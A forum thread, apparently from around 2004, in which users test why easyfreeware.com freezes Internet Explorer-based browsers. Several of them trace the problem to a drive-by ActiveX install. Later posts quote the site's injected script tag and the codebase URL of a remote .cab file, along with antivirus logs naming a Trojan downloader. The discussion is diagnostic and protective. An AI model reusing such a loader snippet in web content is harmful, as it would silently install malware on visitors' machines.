Easyfreeware.com

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Henk de Jong

Checking the links mentioned on my pages, I tried to reach EasyFreeware
(http://www.easyfreeware.com/). Every time I tried this site with
SlimBrowser or IE, both browsers froze, and using Mozilla it took some
time to load the site.

Can somebody else try this site, and tell his/her findings in here?

Thanks.

With kind regards,

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Henk de Jong
The Netherlands
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'Links to Freeware'
http://www.linkstofreeware.nl/
http://www.linkstofreeware.vze.com/
http://home.hccnet.nl/hmdejong/
 
Henk said:
Checking the links mentioned on my pages, I tried to reach EasyFreeware
(http://www.easyfreeware.com/). Every time I tried this site with
SlimBrowser or IE, both browsers froze, and using Mozilla it took some
time to load the site.

Can somebody else try this site, and tell his/her findings in here?

Thanks.

With kind regards,

--
Henk de Jong
The Netherlands
(e-mail address removed) (Remove _NO_SPAM_)
'Links to Freeware'
http://www.linkstofreeware.nl/
http://www.linkstofreeware.vze.com/
http://home.hccnet.nl/hmdejong/

Just tried it with FireFox and had no problems, loaded very fast.

Zo
 
Henk said:
Checking the links mentioned on my pages, I tried to reach EasyFreeware
(http://www.easyfreeware.com/). Every time I tried this site with
SlimBrowser or IE, both browsers froze, and using Mozilla it took some
time to load the site.

Can somebody else try this site, and tell his/her findings in here?

Thanks.

With kind regards,
Instant accesss with Firefox 1.0.

Neil
 
Henk de Jong said:
Checking the links mentioned on my pages, I tried to reach EasyFreeware
(http://www.easyfreeware.com/). Every time I tried this site with
SlimBrowser or IE, both browsers froze, and using Mozilla it took some
time to load the site.

Can somebody else try this site, and tell his/her findings in here?

Avant loaded 88%of the page very quickly, and then froze.
 
Henk said:
Checking the links mentioned on my pages, I tried to reach EasyFreeware
(http://www.easyfreeware.com/). Every time I tried this site with
SlimBrowser or IE, both browsers froze, and using Mozilla it took some
time to load the site.

Can somebody else try this site, and tell his/her findings in here?

Thanks.

With kind regards,
Just tried it with Mozilla 1.6, no problems loaded in 1 second.
JSP
 
Checking the links mentioned on my pages, I tried to reach EasyFreeware
(http://www.easyfreeware.com/). Every time I tried this site with
SlimBrowser or IE, both browsers froze, and using Mozilla it took some
time to load the site.

Can somebody else try this site, and tell his/her findings in here?


IE: Trys to load some kind of plug-in.

Maxthon: Loads the text, but wants to load something else as well.
 
Henk said:
Checking the links mentioned on my pages, I tried to reach EasyFreeware
(http://www.easyfreeware.com/). Every time I tried this site with
SlimBrowser or IE, both browsers froze, and using Mozilla it took some
time to load the site.

Can somebody else try this site, and tell his/her findings in here?

Fine here with Opera.
 
Checking the links mentioned on my pages, I tried to reach EasyFreeware
(http://www.easyfreeware.com/). Every time I tried this site with
SlimBrowser or IE, both browsers froze, and using Mozilla it took some
time to load the site.

Can somebody else try this site, and tell his/her findings in here?

Thanks.

With kind regards,
Just tried with Avant and it won't load for me. Totally freezes.
 
Checking the links mentioned on my pages, I tried to reach EasyFreeware
(http://www.easyfreeware.com/). Every time I tried this site with
SlimBrowser or IE, both browsers froze, and using Mozilla it took some
time to load the site.

Can somebody else try this site, and tell his/her findings in here?

Thanks.

With kind regards,
I have my security settings set to prompt for active x.Using myie2 if I deny
activex the site and myie2 freezes with "activex denied" showing in the
browser task bar.If i enable active x theres no problem.
me
 
Checking the links mentioned on my pages, I tried to reach EasyFreeware
(http://www.easyfreeware.com/). Every time I tried this site with
SlimBrowser or IE, both browsers froze, and using Mozilla it took some
time to load the site.

Can somebody else try this site, and tell his/her findings in here?

Loads fast without problems with K-meleon.
 
Checking the links mentioned on my pages, I tried to reach EasyFreeware
(http://www.easyfreeware.com/). Every time I tried this site with
SlimBrowser or IE, both browsers froze, and using Mozilla it took some
time to load the site.


With my "normal" IE 6.0" your site is working very well, the
sub-pages too.

°°°°°°°°°
 
Henk said:
Checking the links mentioned on my pages, I tried to reach
EasyFreeware (http://www.easyfreeware.com/). Every time I tried this
site with SlimBrowser or IE, both browsers froze, and using Mozilla
it took some time to load the site.

Can somebody else try this site, and tell his/her findings in here?

Thanks.

With kind regards,

Hi Henk,

Tried a moment ago with Sleipnir (IE shell) with activeX off... no
problem at all!

HtH
Dick
 
Henk de Jong said:
Checking the links mentioned on my pages, I tried to reach EasyFreeware
(http://www.easyfreeware.com/). Every time I tried this site with
SlimBrowser or IE, both browsers froze, and using Mozilla it took some
time to load the site.

Can somebody else try this site, and tell his/her findings in here?

Thanks.

With kind regards,

As I posted last time you asked about this site.

It runs a script that attempted to install an activeX component
that appears to be malware.

addictivetechnologies.net/dm0/js/NewConfirmrdaerafrrl.js

class id = "00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http://www.addictivetechnologies.net/DM0/cab/rdaerafrrl.cab"

(When I previously downloaded the cab file and as far as I recall,
my Anti-virus identified ATPartners.dll as a Trojan downloader. )

I think the way the script is written gets it stuck in a loop
if installing the activex component causes an error.

I get a warning that IE blocked an activeX component then
it gets stuck - I use a feature of IE that only allows activeX
components that I've added to it's approved list to be run or
installed (only ones I use and I don't regard as a security risk)
and a simple script to manage them.

However if you've got a cookie from the addictivetechnologies
site it skips the install and the main site works, I wouldn't
touch it with a bargepole though.
 
Mel said:
As I posted last time you asked about this site.

It runs a script that attempted to install an activeX component
that appears to be malware.

addictivetechnologies.net/dm0/js/NewConfirmrdaerafrrl.js

class id = "00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http://www.addictivetechnologies.net/DM0/cab/rdaerafrrl.cab"

(When I previously downloaded the cab file and as far as I recall,
my Anti-virus identified ATPartners.dll as a Trojan downloader. )

I think the way the script is written gets it stuck in a loop
if installing the activex component causes an error.

I get a warning that IE blocked an activeX component then
it gets stuck - I use a feature of IE that only allows activeX
components that I've added to it's approved list to be run or
installed (only ones I use and I don't regard as a security risk)
and a simple script to manage them.

However if you've got a cookie from the addictivetechnologies
site it skips the install and the main site works, I wouldn't
touch it with a bargepole though.

Thanks all for your comments. I highly appreciate your co-operation.

I added a line to the comment of EasyFreeware on my pages, that IE and
IE-related browsers may crash, and that this doesn't happen with
Firefox, Mozilla related browsers.

With kind regards,

--
Henk de Jong
The Netherlands
(e-mail address removed) (Remove _NO_SPAM_)
'Links to Freeware'
http://www.linkstofreeware.nl/
http://www.linkstofreeware.vze.com/
http://home.hccnet.nl/hmdejong/
 
Thanks all for your comments. I highly appreciate your co-operation.
I added a line to the comment of EasyFreeware on my pages, that IE and
IE-related browsers may crash, and that this doesn't happen with
Firefox, Mozilla related browsers.

Henk, are you sure the site should be listed at all?


C:\TEMP
rdaerafrrl.cab
ArchiveType: CAB (Microsoft)
--> ATPartners.dll
[DETECTION] The Trojan horse TR/Small.GS.2
 
REM said:
C:\TEMP
rdaerafrrl.cab
ArchiveType: CAB (Microsoft)
--> ATPartners.dll
[DETECTION] The Trojan horse TR/Small.GS.2

Just now put ATPartners.dll in Google and got back a web page title
that I liked: "Most Un-Wanted List"

http://www.winpatrol.com/stats.html

| WinPatrol's Most UN-WANTED List
|
| Some of the following parasites are Adware, Spyware or start/search
| page hijackers programs. Others are potentially dangerous worms or viruses
[...]
 
Henk de Jong said:
Thanks all for your comments. I highly appreciate your co-operation.

I added a line to the comment of EasyFreeware on my pages, that IE and
IE-related browsers may crash, and that this doesn't happen with
Firefox, Mozilla related browsers.


I'm surprised you'd recommend that site at-all!
However if you must, I suggest you recommend adding it to IE's
restricted site zone before visiting to ensure that plugin can't be installed.
(It also seems to fix the problem with IE getting stuck in a loop on my
computer as scripting is also disabled in this zone).

I just manually downloaded the cab it attempts to install
and scanned it with Antidote which I believe is based on Kaspersky

=== ANTIDOTE for PC Viruses Super Lite Log File ===


Virus Check at : Tue Oct 19 16:39:15 2004
Target Path for Virus Check : D:\virus

<<< Virus Check Statistics >>>

1 System Memory = OK
2 Boot Sector = OK
3 D:\virus\rdaerafrrl.cab = Archive : CAB
4 D:\virus\rdaerafrrl.cab/ATPartners.dll = Infected : TrojanDownloader.Win32.Rameh.c


=== End of Log ===

see:-

http://www.pestpatrol.com/pestinfo/t/trojandownloader_win32_rameh_c.asp


Offending HTML from easyfreeware.com

<script language="JavaScript" type="text/JavaScript"
src="http://WWW.addictivetechnologies.net/dm0/js/NewConfirmrdaerafrrl.js"></script>

</HEAD>



Regards,

Mel
 
Henk said:
I added a line to the comment of EasyFreeware on my pages, that IE and
IE-related browsers may crash, and that this doesn't happen with
Firefox, Mozilla related browsers.

Seems daft to list it in view of all the adverse comments.
 
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